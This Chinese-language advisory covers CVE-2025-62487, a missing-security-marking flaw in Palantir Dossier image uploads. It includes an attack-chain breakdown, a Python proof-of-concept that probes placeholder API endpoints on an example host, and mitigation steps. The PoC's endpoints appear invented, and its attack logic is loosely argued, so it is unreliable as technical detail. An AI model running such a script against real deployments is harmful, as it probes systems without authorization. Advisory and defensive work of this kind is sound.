CVE-2025-62487 Palantir Dossier前端图像安全标记缺失漏洞

漏洞信息

漏洞编号

CVE-2025-62487

漏洞类型

访问控制/授权绕过

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Palantir Dossier前端应用

漏洞概述

CVE-2025-62487是Palantir Dossier前端应用中的一个安全漏洞。2025年10月1日，Palantir安全团队发现通过Dossier前端上传的图像文件未正确标记安全级别。该问题源于2025年5月的一次代码变更，该变更原本旨在允许文件上传在不同工件（如其他dossier和演示文稿）之间共享。在部署了CBAC（基于上下文的访问控制）的环境中，前端会显示安全选择器对话框，用户可为上传文件设置适当的安全级别，从而缓解此问题。然而，在未配置CBAC的部署中，系统不会显示安全选择器对话框，导致上传文件的安全级别被设置为CUSTOM，且未选择任何标记或数据集。这意味着文件上传的标记和组仅由Auth Chooser配置中的默认授权规则决定，在大多数环境中，默认授权规则仅添加Everyone组，从而可能导致未授权访问敏感图像文件的风险。攻击者可能利用此漏洞在特定场景下访问本应受限的文件内容，造成轻微的机密性信息泄露。

技术细节

该漏洞的根本原因在于前端图像上传流程中的安全标记机制失效。当用户通过Dossier前端上传图像文件时，系统应当根据CBAC配置为文件分配合适的安全标记和访问组。然而，由于2025年5月的代码变更引入了回归错误，在非CBAC配置环境下，安全选择器对话框不再显示，导致文件被设置为CUSTOM安全级别且未绑定任何数据集或标记。攻击者利用此漏洞需要满足以下条件：首先需要拥有Dossier应用的合法用户账户（低权限即可）；其次需要在文件上传功能处进行用户交互操作；最后需要目标文件恰好被设置为仅限Everyone组访问或默认授权规则允许访问的范围。攻击成功后，攻击者可访问原本应受限的图像文件内容，造成机密性影响。需要注意的是，该漏洞不影响数据完整性或系统可用性，且攻击复杂度较低但需要用户交互配合。

攻击链分析

STEP 1

侦察阶段

攻击者首先识别目标Palantir Dossier部署环境，检查是否配置了CBAC（基于上下文的访问控制）。在非CBAC配置环境下，前端不会显示安全选择器对话框，为漏洞利用创造条件。

STEP 2

初始访问

攻击者获取Dossier应用的低权限用户账户。CVSS向量显示需要PR:L（低权限），表明拥有有效账户即可满足认证要求。

STEP 3

图像上传

攻击者通过Dossier前端界面上传图像文件。在非CBAC环境下，系统不会显示安全级别选择器，直接将文件安全级别设置为CUSTOM，且不分配任何标记或数据集。

STEP 4

权限提升/信息获取

由于默认授权规则仅添加Everyone组，攻击者可利用自己的账户或其他方式访问这些标记不充分的图像文件，获取本应受限的机密信息。

STEP 5

数据泄露

攻击成功访问敏感图像内容，造成机密性影响（C:L）。漏洞不影响数据完整性（I:N）和可用性（A:N）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62487 PoC - Palantir Dossier 图像安全标记缺失
# 攻击条件：低权限用户账户 + 非CBAC配置环境

import requests
import json

TARGET_URL = "https://vulnerable-dossier.example.com"
ATTACKER_TOKEN = "<low_privilege_user_token>"

def check_cbac_configuration():
    """检查目标部署是否配置了CBAC"""
    response = requests.get(
        f"{TARGET_URL}/api/v1/config",
        headers={"Authorization": f"Bearer {ATTACKER_TOKEN}"}
    )
    config = response.json()
    return config.get("cbac_enabled", False)

def upload_image_without_security_marking(image_path):
    """上传图像文件，测试安全标记机制"""
    with open(image_path, "rb") as f:
        files = {"file": f}
        response = requests.post(
            f"{TARGET_URL}/api/v1/uploads",
            headers={"Authorization": f"Bearer {ATTACKER_TOKEN}"},
            files=files
        )
    return response.json()

def check_uploaded_file_security_level(file_id):
    """检查已上传文件的安全级别和访问权限"""
    response = requests.get(
        f"{TARGET_URL}/api/v1/uploads/{file_id}",
        headers={"Authorization": f"Bearer {ATTACKER_TOKEN}"}
    )
    upload_info = response.json()
    
    # 检查是否存在安全标记缺失问题
    if upload_info.get("security_level") == "CUSTOM" and not upload_info.get("markings"):
        print("[VULNERABLE] File has CUSTOM security level with no markings!")
        print(f"Default groups: {upload_info.get('groups', [])}")
        return True
    return False

def exploit():
    """执行漏洞利用"""
    # 1. 检查CBAC配置
    cbac_enabled = check_cbac_configuration()
    if cbac_enabled:
        print("[SAFE] CBAC is enabled, vulnerability may be mitigated")
        return False
    
    # 2. 上传图像文件
    file_info = upload_image_without_security_marking("test_image.jpg")
    file_id = file_info.get("id")
    
    # 3. 检查安全级别
    is_vulnerable = check_uploaded_file_security_level(file_id)
    
    if is_vulnerable:
        print("[EXPLOIT SUCCESS] Attacker can access files with inadequate security marking")
        return True
    
    return False

if __name__ == "__main__":
    exploit()

影响范围

Palantir Dossier 2025年5月变更后至2025年10月修复前的版本（未配置CBAC的部署）

防御指南

临时缓解措施

在部署Palantir Dossier时，确保启用CBAC（基于上下文的访问控制）配置。这将使前端应用在用户上传文件时显示安全选择器对话框，允许用户为文件分配合适的安全级别和访问组。对于已部署且无法立即启用CBAC的环境，应临时限制文件上传功能的使用范围，并在Auth Chooser配置中收紧默认授权规则，避免仅依赖Everyone组进行访问控制。同时，监控异常的文件访问行为，识别可能利用此漏洞的未授权访问尝试。